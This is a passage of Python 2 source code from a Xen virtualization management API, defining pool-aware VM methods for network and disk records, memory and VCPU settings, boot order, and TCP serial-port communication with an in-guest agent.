if not list_network:
return xen_api_error(['NETWORK_NOT_EXISTS'])
net_ref = list_network[0]
net = XendAPIStore.get(net_ref, "network")
return xen_api_success(net.get_record())
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_get_network_record", vm_ref, vif)
else:
xenapi = self._get_XendAPI_instance()
bridge = self._VIF_get(vif, "bridge").get('Value')
list_network = xenapi.network_get_by_name_label(session, bridge).get('Value')
if not list_network:
return xen_api_error(['NETWORK_NOT_EXISTS'])
net_ref = list_network[0]
net = XendAPIStore.get(net_ref, "network")
return xen_api_success(net.get_record())
def VM_get_VBD_record(self, session, vm_ref, vbd_ref):
'''
@author: wuyuewen
        @summary: Get a VBD record; this method is used in place of VBD_get_record() in a Pool.
@param session: session of RPC.
@param vm_ref: uuid
@param vbd_ref: VBD uuid
@return: VBD record struct.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self.VBD_get_record(session, vbd_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VBD_get_record", vbd_ref)
else:
return self.VBD_get_record(session, vbd_ref)
def VM_get_system_VDI(self, session, vm_ref):
'''
@author: wuyuewen
        @summary: Get the VDI that the VM's system VBD links to: VM->VBD (VM's disk)->VDI (storage management).
@precondition: VM has system VBD device.
@param session: session of RPC.
@param vm_ref: uuid
@return: VDI.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_system_VDI(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_get_system_VDI", vm_ref)
else:
return self._VM_get_system_VDI(session, vm_ref)
def _VM_get_system_VDI(self, session, vm_ref):
'''
@author: wuyuewen
        @summary: Internal method. Get the VDI that the VM's system VBD links to: VM->VBD (VM's disk)->VDI (storage management).
@precondition: VM has system VBD device.
@param session: session of RPC.
@param vm_ref: uuid
@return: VDI.
@rtype: dict.
'''
vbds = self._VM_get_VBDs(session, vm_ref).get('Value', [])
sys_vbd = ''
sys_vdi = ''
if vbds:
for vbd in vbds:
bootable = self.VBD_get_bootable(session, vbd).get('Value', False)
vbd_type = self.VBD_get_type(session, vbd).get('Value', '')
if bootable and cmp(vbd_type, 'Disk') == 0:
sys_vbd = vbd
break
if sys_vbd:
sys_vdi = self.VBD_get_VDI(session, sys_vbd).get('Value', '')
return xen_api_success(sys_vdi)
def VM_set_name_label(self, session, vm_ref, label):
'''
@author: wuyuewen
@summary: Set VM's name label.
        @precondition: Only English is supported; param <label> must contain no special characters except "_", "-" and ".".
@param session: session of RPC.
@param vm_ref: uuid
@param label: name label to change.
@return: True | False
@rtype: dict.
@raise xen_api_error: VM error
'''
try:
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
self._VM_set_name_label(session, vm_ref, label)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
xen_rpc_call(remote_ip, 'VM_set_name_label', vm_ref, label)
return xen_api_success_void()
else:
return self._VM_set_name_label(session, vm_ref, label)
except VmError, e:
return xen_api_error(['VM error: ', e])
def _VM_set_name_label(self, session, vm_ref, label):
'''
@author: wuyuewen
@summary: Internal method. Set VM's name label.
        @precondition: Only English is supported; param <label> must contain no special characters except "_", "-" and ".".
@param session: session of RPC.
@param vm_ref: uuid
@param label: name label to change.
@return: True | False
@rtype: dict.
@raise xen_api_error: VM error
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
dom.setName(label)
self._VM_save(dom)
return xen_api_success_void()
def VM_set_name_description(self, session, vm_ref, desc):
'''
@author: wuyuewen
@summary: Set VM's name description.
        @precondition: Only English is supported; param <desc> must contain no special characters except "_", "-" and ".".
@param session: session of RPC.
@param vm_ref: uuid
@param desc: name description to change.
@return: True | False
@rtype: dict.
@raise xen_api_error: VM error
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_name_description(session, vm_ref, desc)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_name_description', vm_ref, desc)
else:
return self._VM_set_name_description(session, vm_ref, desc)
def _VM_set_name_description(self, session, vm_ref, desc):
'''
@author: wuyuewen
@summary: Internal method. Set VM's name description.
        @precondition: Only English is supported; param <desc> must contain no special characters except "_", "-" and ".".
@param session: session of RPC.
@param vm_ref: uuid
@param desc: name description to change.
@return: True | False
@rtype: dict.
@raise xen_api_error: VM error
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
dom.setNameDescription(desc)
self._VM_save(dom)
return xen_api_success_void()
def VM_set_user_version(self, session, vm_ref, ver):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_todo()
def VM_set_is_a_template(self, session, vm_ref, is_template):
'''
@author: wuyuewen
@summary: Change a VM to VM template, or change a VM template to VM.
@precondition: VM not running.
@param session: session of RPC.
@param vm_ref: uuid
@param is_template: True | False
@return: True | False
@rtype: dict.
@raise xen_api_error: VM_BAD_POWER_STATE
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
host_ip = BNPoolAPI.get_host_ip(host_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_is_a_template(session, vm_ref, is_template)
else:
return xen_rpc_call(host_ip, 'VM_set_is_a_template', vm_ref, is_template)
else:
return self._VM_set_is_a_template(session, vm_ref, is_template)
def _VM_set_is_a_template(self, session, vm_ref, is_template):
'''
@author: wuyuewen
@summary: Internal method. Change a VM to VM template, or change a VM template to VM.
@precondition: VM not running.
@param session: session of RPC.
@param vm_ref: uuid
@param is_template: True | False
@return: True | False
@rtype: dict.
@raise xen_api_error: VM_BAD_POWER_STATE
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
if dom._stateGet() == XEN_API_VM_POWER_STATE_RUNNING:
return xen_api_error(
['VM_BAD_POWER_STATE', vm_ref,
XendDomain.POWER_STATE_NAMES[XEN_API_VM_POWER_STATE_RUNNING],
XendDomain.POWER_STATE_NAMES[dom._stateGet()]])
dom.set_is_a_template(is_template)
self.VM_save(dom)
return xen_api_success_void()
# #Mapping intranet ip address to outer net ip address.
# def VM_set_ip_map(self, session, vm_ref, vif):
# if BNPoolAPI._isMaster:
# host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
# if cmp(host_ref, XendNode.instance().uuid) == 0:
# return self._VM_set_ip_map(session, vm_ref, vif)
# else:
# host_ip = BNPoolAPI.get_host_ip(host_ref)
# return xen_rpc_call(host_ip, 'VM_set_ip_map', vm_ref, vif)
# else:
# return self._VM_set_ip_map(session, vm_ref, vif)
#
# def _VM_set_ip_map(self, session, vm_ref, vif):
# mac = None
# mac_rec = self.VIF_get_MAC(session, vif)
# if mac_rec.get('Status') == 'Success':
# mac = mac_rec.get('Value')
# if mac:
# dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
# dom.set_ip_map(mac)
# return xen_api_success(self._VM_save(dom))
# else:
# log.error('Can not get MAC from vif.')
# return xen_api_error(['Get MAC from vif failed!VM:', vm_ref])
# def VM_del_ip_map(self, session, vm_ref, vif):
# if BNPoolAPI._isMaster:
# host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
# if cmp(host_ref, XendNode.instance().uuid) == 0:
# return self._VM_del_ip_map(session, vm_ref, vif)
# else:
# host_ip = BNPoolAPI.get_host_ip(host_ref)
# return xen_rpc_call(host_ip, 'VM_del_ip_map', vm_ref, vif)
# else:
# return self._VM_del_ip_map(session, vm_ref, vif)
#
# def _VM_del_ip_map(self, session, vm_ref, vif):
# mac = None
# mac_rec = self.VIF_get_MAC(session, vif)
# if mac_rec.get('Status') == 'Success':
# mac = mac_rec.get('Value')
# if mac:
# dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
# dom.set_ip_map(mac, True)
# return xen_api_success(self._VM_save(dom))
# else:
# log.error('Can not get MAC from vif.')
# return xen_api_error(['Get MAC from vif failed!VM:', vm_ref])
def VM_set_auto_power_on(self, session, vm_ref, val):
'''
@deprecated: not used
'''
return self.VM_set('auto_power_on', session, vm_ref, val)
def VM_set_memory_dynamic_max(self, session, vm_ref, mem):
'''
@author: wuyuewen
@summary: Set VM's memory dynamic max.
@precondition: VM not running, memory dynamic max > 0, memory dynamic max <= memory static max.
@param session: session of RPC.
@param vm_ref: uuid
@param mem: memory(Bytes)
@return: True | False.
@rtype: dict.
@raise XendConfigError:
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_memory_dynamic_max(session, vm_ref, mem)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_set_memory_dynamic_max', vm_ref, mem)
else:
return self._VM_set_memory_dynamic_max(session, vm_ref, mem)
def _VM_set_memory_dynamic_max(self, session, vm_ref, mem):
'''
@author: wuyuewen
@summary: Internal method. Set VM's memory dynamic max.
@precondition: VM not running, memory dynamic max > 0, memory dynamic max <= memory static max.
@param session: session of RPC.
@param vm_ref: uuid
@param mem: memory(Bytes)
@return: True | False.
@rtype: dict.
@raise XendConfigError:
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
dom.set_memory_dynamic_max(int(mem))
return self._VM_save(dom)
def VM_set_memory_dynamic_min(self, session, vm_ref, mem):
'''
@author: wuyuewen
@summary: Set VM's memory dynamic min.
@precondition: VM not running, memory dynamic min >= memory static min.
@param session: session of RPC.
@param vm_ref: uuid
@param mem: memory(Bytes)
@return: True | False.
@rtype: dict.
@raise XendConfigError:
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_memory_dynamic_min(session, vm_ref, mem)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_set_memory_dynamic_min', vm_ref, mem)
else:
return self._VM_set_memory_dynamic_min(session, vm_ref, mem)
def _VM_set_memory_dynamic_min(self, session, vm_ref, mem):
'''
@author: wuyuewen
@summary: Internal method. Set VM's memory dynamic min.
@precondition: VM not running, memory dynamic min >= memory static min.
@param session: session of RPC.
@param vm_ref: uuid
@param mem: memory(Bytes)
@return: True | False.
@rtype: dict.
@raise XendConfigError:
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
dom.set_memory_dynamic_min(int(mem))
return self._VM_save(dom)
def VM_set_memory_static_max(self, session, vm_ref, mem):
'''
@author: wuyuewen
@summary: Set VM's memory static max.
@precondition: VM not running, memory static max > 0, memory dynamic max <= memory static max.
@param session: session of RPC.
@param vm_ref: uuid
@param mem: memory(Bytes)
@return: True | False.
@rtype: dict.
@raise XendConfigError:
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_memory_static_max(session, vm_ref, mem)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_set_memory_static_max', vm_ref, mem)
else:
return self._VM_set_memory_static_max(session, vm_ref, mem)
def _VM_set_memory_static_max(self, session, vm_ref, mem):
'''
@author: wuyuewen
@summary: Internal method. Set VM's memory static max.
@precondition: VM not running, memory static max > 0, memory dynamic max <= memory static max.
@param session: session of RPC.
@param vm_ref: uuid
@param mem: memory(Bytes)
@return: True | False.
@rtype: dict.
@raise XendConfigError:
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
dom.set_memory_static_max(int(mem))
return self._VM_save(dom)
def VM_set_memory_static_min(self, session, vm_ref, mem):
'''
@author: wuyuewen
@summary: Set VM's memory static min.
@precondition: VM not running, memory dynamic min >= memory static min.
@param session: session of RPC.
@param vm_ref: uuid
@param mem: memory(Bytes)
@return: True | False.
@rtype: dict.
@raise XendConfigError:
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_memory_static_min(session, vm_ref, mem)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_set_memory_static_min', vm_ref, mem)
else:
return self._VM_set_memory_static_min(session, vm_ref, mem)
def _VM_set_memory_static_min(self, session, vm_ref, mem):
'''
@author: wuyuewen
@summary: Internal method. Set VM's memory static min.
@precondition: VM not running, memory dynamic min >= memory static min.
@param session: session of RPC.
@param vm_ref: uuid
@param mem: memory(Bytes)
@return: True | False.
@rtype: dict.
@raise XendConfigError:
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
dom.set_memory_static_min(int(mem))
return self._VM_save(dom)
def VM_set_memory_dynamic_max_live(self, session, vm_ref, mem):
'''
@author: wuyuewen
@summary: Set VM's memory dynamic max when VM is running.
@precondition: memory dynamic max > 0, memory dynamic max <= memory static max.
@param session: session of RPC.
@param vm_ref: uuid
@param mem: memory(Bytes)
@return: True | False.
@rtype: dict.
@raise XendConfigError:
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_memory_dynamic_max_live(session, vm_ref, mem)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_set_memory_dynamic_max_live', vm_ref, mem)
else:
return self._VM_set_memory_dynamic_max_live(session, vm_ref, mem)
def _VM_set_memory_dynamic_max_live(self, session, vm_ref, mem):
'''
@author: wuyuewen
@summary: Internal method. Set VM's memory dynamic max when VM is running.
@precondition: memory dynamic max > 0, memory dynamic max <= memory static max.
@param session: session of RPC.
@param vm_ref: uuid
@param mem: memory(Bytes)
@return: True | False.
@rtype: dict.
@raise XendConfigError:
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
        log.debug('set memory_dynamic_max_live to %s bytes' % mem)
dom.set_memory_dynamic_max(int(mem))
# need to pass target as MiB
dom.setMemoryTarget(int(mem)/1024/1024)
return xen_api_success_void()
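    # Example (illustrative; 'api' as above): mem is given in bytes while the
    # balloon target is set in MiB, so raising a running VM's dynamic max to
    # 2 GiB is:
    #
    #     api.VM_set_memory_dynamic_max_live(session, vm_ref, 2 * 1024 * 1024 * 1024)
    #
    # which internally calls dom.setMemoryTarget(2048).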
def VM_set_memory_dynamic_min_live(self, session, vm_ref, mem):
'''
@author: wuyuewen
@summary: Set VM's memory dynamic min when VM is running.
@precondition: memory dynamic min >= memory static min.
@param session: session of RPC.
@param vm_ref: uuid
@param mem: memory(Bytes)
@return: True | False.
@rtype: dict.
@raise XendConfigError:
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_memory_dynamic_min_live(session, vm_ref, mem)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_set_memory_dynamic_min_live', vm_ref, mem)
else:
return self._VM_set_memory_dynamic_min_live(session, vm_ref, mem)
def _VM_set_memory_dynamic_min_live(self, session, vm_ref, mem):
'''
@author: wuyuewen
@summary: Internal method. Set VM's memory dynamic min when VM is running.
@precondition: memory dynamic min >= memory static min.
@param session: session of RPC.
@param vm_ref: uuid
@param mem: memory(Bytes)
@return: True | False.
@rtype: dict.
@raise XendConfigError:
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
dom.set_memory_dynamic_min(int(mem))
# need to pass target as MiB
dom.setMemoryTarget(int(mem) / 1024 / 1024)
return xen_api_success_void()
def VM_set_VCPUs_params(self, session, vm_ref, value):
'''
@deprecated: not used
'''
return self.VM_set('vcpus_params', session, vm_ref, value)
def VM_add_to_VCPUs_params(self, session, vm_ref, key, value):
'''
@deprecated: not used
'''
log.debug('in VM_add_to_VCPUs_params')
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
if 'vcpus_params' not in dom.info:
dom.info['vcpus_params'] = {}
dom.info['vcpus_params'][key] = value
return self._VM_save(dom)
def VM_add_to_VCPUs_params_live(self, session, vm_ref, key, value):
'''
@deprecated: not used
'''
self.VM_add_to_VCPUs_params(session, vm_ref, key, value)
self._VM_VCPUs_params_refresh(vm_ref)
return xen_api_success_void()
def _VM_VCPUs_params_refresh(self, vm_ref):
'''
@deprecated: not used
'''
xendom = XendDomain.instance()
xeninfo = xendom.get_vm_by_uuid(vm_ref)
#update the cpumaps
for key, value in xeninfo.info['vcpus_params'].items():
if key.startswith("cpumap"):
log.debug(key)
if len(key) == 6:
continue
vcpu = int(key[6:])
try:
cpus = map(int, value.split(","))
xendom.domain_pincpu(xeninfo.getDomid(), vcpu, value)
except Exception, ex:
log.exception(ex)
        # need to update sched params as well
if 'weight' in xeninfo.info['vcpus_params'] \
and 'cap' in xeninfo.info['vcpus_params']:
weight = xeninfo.info['vcpus_params']['weight']
xendom.domain_sched_credit_set(xeninfo.getDomid(), weight)
def VM_set_VCPUs_number_live(self, _, vm_ref, num):
'''
@author: wuyuewen
@summary: Set VM's VCPUs number when VM is running.
@precondition: num > 0, num < max_cpu_limit(see /etc/xen/setting).
@param session: session of RPC.
@param vm_ref: uuid
@param num: num of VCPU
@return: True | False.
@rtype: dict.
@raise XendError:
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_VCPUs_number_live(_, vm_ref, num)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_VCPUs_number_live', vm_ref, num)
else:
return self._VM_set_VCPUs_number_live(_, vm_ref, num)
def _VM_set_VCPUs_number_live(self, _, vm_ref, num):
'''
@author: wuyuewen
@summary: Internal method. Set VM's VCPUs number when VM is running.
@precondition: num > 0, num < max_cpu_limit(see /etc/xen/setting).
@param session: session of RPC.
@param vm_ref: uuid
@param num: num of VCPU
@return: True | False.
@rtype: dict.
@raise XendError:
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
dom.setVCpuCount(int(num))
return xen_api_success_void()
def VM_remove_from_VCPUs_params(self, session, vm_ref, key):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
if 'vcpus_params' in dom.info \
and key in dom.info['vcpus_params']:
del dom.info['vcpus_params'][key]
return self._VM_save(dom)
else:
return xen_api_success_void()
def VM_set_VCPUs_at_startup(self, session, vm_ref, num):
'''
@author: wuyuewen
@summary: Set VM's VCPUs when vm startup.
        @todo: does not work
@precondition: VM not running, num > 0, num < max_cpu_limit(see /etc/xen/setting).
@param session: session of RPC.
@param vm_ref: uuid
@param num: num of VCPU
@return: True | False.
@rtype: dict.
@raise XendError:
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_VCPUs_at_startup(session, vm_ref, num)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_VCPUs_at_startup', vm_ref, num)
else:
return self._VM_set_VCPUs_at_startup(session, vm_ref, num)
def _VM_set_VCPUs_at_startup(self, session, vm_ref, num):
'''
@author: wuyuewen
@summary: Internal method. Set VM's VCPUs when vm startup.
        @todo: does not work
@precondition: VM not running, num > 0, num < max_cpu_limit(see /etc/xen/setting).
@param session: session of RPC.
@param vm_ref: uuid
@param num: num of VCPU
@return: True | False.
@rtype: dict.
@raise XendError:
'''
return self.VM_set('VCPUs_at_startup', session, vm_ref, num)
def VM_set_VCPUs_max(self, session, vm_ref, num):
'''
@author: wuyuewen
        @summary: Set VM's VCPUs number.
@precondition: VM not running, num > 0, num < max_cpu_limit(see /etc/xen/setting).
@param session: session of RPC.
@param vm_ref: uuid
@param num: num of VCPU
@return: True | False.
@rtype: dict.
@raise XendError:
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_VCPUs_max(session, vm_ref, num)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_VCPUs_max', vm_ref, num)
else:
return self._VM_set_VCPUs_max(session, vm_ref, num)
def _VM_set_VCPUs_max(self, session, vm_ref, num):
'''
@author: wuyuewen
@summary: Internal method. Set VM's VCPUs number.
@precondition: VM not running, num > 0, num < max_cpu_limit(see /etc/xen/setting).
@param session: session of RPC.
@param vm_ref: uuid
@param num: num of VCPU
@return: True | False.
@rtype: dict.
@raise XendError:
'''
dominfo = XendDomain.instance().get_vm_by_uuid(vm_ref)
dominfo.setVCpuCount(int(num))
return xen_api_success_void()
# return self.VM_set('VCPUs_max', session, vm_ref, num)
def VM_set_actions_after_shutdown(self, session, vm_ref, action):
'''
@deprecated: not used
'''
if action not in XEN_API_ON_NORMAL_EXIT:
return xen_api_error(['VM_ON_NORMAL_EXIT_INVALID', vm_ref])
return self.VM_set('actions_after_shutdown', session, vm_ref, action)
def VM_set_actions_after_reboot(self, session, vm_ref, action):
'''
@deprecated: not used
'''
if action not in XEN_API_ON_NORMAL_EXIT:
return xen_api_error(['VM_ON_NORMAL_EXIT_INVALID', vm_ref])
return self.VM_set('actions_after_reboot', session, vm_ref, action)
def VM_set_actions_after_suspend(self, session, vm_ref, action):
'''
@deprecated: not used
'''
if action not in XEN_API_ON_NORMAL_EXIT:
return xen_api_error(['VM_ON_NORMAL_EXIT_INVALID', vm_ref])
return self.VM_set('actions_after_suspend', session, vm_ref, action)
def VM_set_actions_after_crash(self, session, vm_ref, action):
'''
@deprecated: not used
'''
if action not in XEN_API_ON_CRASH_BEHAVIOUR:
return xen_api_error(['VM_ON_CRASH_BEHAVIOUR_INVALID', vm_ref])
return self.VM_set('actions_after_crash', session, vm_ref, action)
# edit by wufan
    # value 'cd': boot from disk first
    # value 'dc': boot from cdrom first
    # change only when the vm is not running
def VM_set_boot_order(self, session, vm_ref, value):
'''
@author: wuyuewen
        @summary: Set VM's boot order; value='cd' boots from disk first, value='dc' boots from cdrom first.
@precondition: VM not running.
@param session: session of RPC.
@param vm_ref: uuid
@param value: cd/dc
@return: True | False.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_boot_order(session, vm_ref, value)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_boot_order', vm_ref, value)
else:
return self._VM_set_boot_order(session, vm_ref, value)
def _VM_set_boot_order(self, session, vm_ref, value):
'''
@author: wuyuewen
        @summary: Internal method. Set VM's boot order; value='cd' boots from disk first, value='dc' boots from cdrom first.
@precondition: VM not running.
@param session: session of RPC.
@param vm_ref: uuid
@param value: cd/dc
@return: True | False.
@rtype: dict.
'''
log.debug('set boot order: %s' % value)
# VM_add_to_HVM_boot_params
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
if 'HVM_boot_params' not in dom.info:
dom.info['HVM_boot_params'] = {}
dom.info['HVM_boot_params']['order'] = value
# VM_add_to_platform
plat = dom.get_platform()
plat['boot'] = value
dom.info['platform'] = plat
# VM_set_HVM_boot_policy
dom.info['HVM_boot_policy'] = 'BIOS order'
return self._VM_save(dom)
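    # Example (illustrative; 'api' as above): make the VM try its disk first,
    # then the cdrom:
    #
    #     api.VM_set_boot_order(session, vm_ref, 'cd')
    #
    # One call updates HVM_boot_params['order'], platform['boot'] and sets
    # HVM_boot_policy to 'BIOS order'.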
# get serial path on host
def VM_get_platform_serial(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get Host TCP port of VM's platform serial.
@param session: session of RPC.
@param vm_ref: uuid
        @return: tuple ('127.0.0.1', port) of the serial device, or an empty tuple if no TCP serial is set.
@rtype: dict.
'''
log.debug('VM get platform serial')
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_platform_serial(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_platform_serial', vm_ref)
else:
return self._VM_get_platform_serial(session, vm_ref)
# get serial devices in platform
def _VM_get_platform_serial(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get Host TCP port of VM's platform serial.
@param session: session of RPC.
@param vm_ref: uuid
        @return: tuple ('127.0.0.1', port) of the serial device, or an empty tuple if no TCP serial is set.
@rtype: dict.
'''
# get serial file path
try:
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
plat = dom.get_platform()
value = plat.get('serial')
            # plat['serial'] looks like 'tcp:127.0.0.1:14000,server,nowait'
            index = value.find('tcp:127.0.0.1:')
            retv = ()
            if index != -1:
                port = value[index+14:index+19]
                retv = ('127.0.0.1', port)
return xen_api_success(retv)
except Exception, exn:
log.exception(exn)
return xen_api_error('get serial path failed')
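    # Example return value (illustrative): if platform['serial'] is
    # 'tcp:127.0.0.1:14000,server,nowait', 'Value' is ('127.0.0.1', '14000');
    # it is an empty tuple when no TCP serial is configured.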
# set serial devices in platform
# eg: serial pipe:/tmp/fifotest
def VM_set_platform_serial(self, session, vm_ref):
'''
@author: wuyuewen
        @summary: Automatically find and set a valid Host TCP port for VM's platform serial;
                the port range is 14000-15000, see PORTS_FOR_SERIAL.
@param session: session of RPC.
@param vm_ref: uuid
@return: True | False.
@rtype: dict.
@raise xen_api_error:
'''
log.debug('VM_set_platform_serial')
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_platform_serial(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_platform_serial', vm_ref)
else:
return self._VM_set_platform_serial(session, vm_ref)
# set serial devices in platform
def _VM_set_platform_serial(self, session, vm_ref):
'''
@author: wuyuewen
        @summary: Internal method. Automatically find and set a valid Host TCP port for VM's platform serial;
                the port range is 14000-15000, see PORTS_FOR_SERIAL.
@param session: session of RPC.
@param vm_ref: uuid
@return: True | False.
@rtype: dict.
@raise xen_api_error:
'''
# get serial file path
# save in the same path with boot vbd
try:
xennode = XendNode.instance()
sysvdi_path = xennode.get_sysvdi_path_by_vm(vm_ref)
if sysvdi_path == '':
log.debug('Invalid system vdi path in vm_ref: %s' % vm_ref)
return xen_api_error("Invalid system vdi path")
# file_name = 'pipe.out'
# SERIAL_FILE = "%s/%s" % (sysvdi_path, file_name)
# if not os.path.exists(SERIAL_FILE):
# os.system("/usr/bin/mkfifo %s" % SERIAL_FILE)
#
# serial_value = 'pipe:%s' % SERIAL_FILE
# log.debug('set serial value: %s' % serial_value)
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
avail_port = dom.get_free_port()
serial_value = 'tcp:127.0.0.1:%s,server,nowait' % avail_port
log.debug('set serial value: %s' % serial_value)
plat = dom.get_platform()
# log.debug('origin platform serial: %s' % plat['serial'])
plat['serial'] = serial_value
dom.info['platform'] = plat
return self._VM_save(dom)
except Exception, exn:
log.debug(exn)
return xen_api_error('create serial failed')
def VM_send_request_via_serial(self, session, vm_ref, json_obj, flag):
'''
@author: wuyuewen
@summary: Send a request into VM's system use serial device.
@precondition: VM is running, has a serial device, already installed a serial Agent in VM's system.
@param session: session of RPC.
@param vm_ref: uuid
@param json_obj: serial request value use json object.
        @param flag: True | False, whether to check that the serial Agent is running in the VM.
@return: True | False.
@rtype: dict.
'''
log.debug('VM send request via serial')
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_send_request_via_serial(session, vm_ref, json_obj, flag)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_send_request_via_serial', vm_ref, json_obj, flag)
else:
return self._VM_send_request_via_serial(session, vm_ref, json_obj, flag)
def _VM_send_request_via_serial(self, session, vm_ref, json_obj, flag):
'''
@author: wuyuewen
@summary: Internal method. Send a request into VM's system use serial device.
@precondition: VM is running, has a serial device, already installed a serial Agent in VM's system.
@param session: session of RPC.
@param vm_ref: uuid
@param json_obj: serial request value use json object.
        @param flag: True | False, whether to check that the serial Agent is running in the VM.
@return: True | False.
@rtype: dict.
'''
try:
response = self._VM_get_platform_serial(session, vm_ref)
if cmp(response['Status'], 'Failure') == 0:
return xen_api_success(False)
address = response.get('Value')
if not address:
log.error('VM serial not correct!')
return xen_api_success(False)
(ip, port) = address
retv = Netctl.serial_opt(ip, port, json_obj, flag)
if retv:
return xen_api_success(True)
else:
return xen_api_success(False)
        except Exception, exn:
log.exception(exn)
return xen_api_success(False)
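    # Example (illustrative; the payload layout depends on the serial Agent
    # installed in the guest, so treat this json_obj as a placeholder):
    #
    #     payload = '{"requestType": "Agent.Ping"}'
    #     ok = api.VM_send_request_via_serial(session, vm_ref, payload, True)
    #
    # 'Value' is True only when the request was delivered successfully.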
# edit by wufan
def VM_set_HVM_boot_policy(self, session, vm_ref, value):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
